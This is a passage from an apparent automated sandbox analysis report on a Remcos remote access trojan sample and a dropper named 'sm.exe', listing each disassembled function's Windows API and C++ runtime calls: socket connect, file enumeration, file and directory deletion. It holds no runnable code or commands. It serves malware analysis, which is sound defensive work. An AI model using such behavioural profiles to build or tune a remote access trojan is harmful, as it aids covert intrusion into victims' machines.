tring@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 18_2_0040477E _EH_prolog,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,socket,connect,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,_CxxThrowException,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QA
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 18_2_00403325 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 18_2_00412BEE wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,FindFirstFileW,wcscpy,RemoveDirectoryW,FindNextFileW,wcscat,RemoveDirectoryW,wcscpy,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 27_2_00404C0A wcscmp,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,tolower,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 27_2_0040751B Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 27_2_00410586 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_t
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 27_2_0040728F Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,DeleteFileA,GetLastError,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 27_2_0040477E _EH_prolog,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,socket,connect,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,_CxxThrowException,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QA
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 27_2_00403325 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 27_2_00412BEE wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,FindFirstFileW,wcscpy,RemoveDirectoryW,FindNextFileW,wcscat,RemoveDirectoryW,wcscpy,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 34_2_00404C0A wcscmp,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,tolower,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@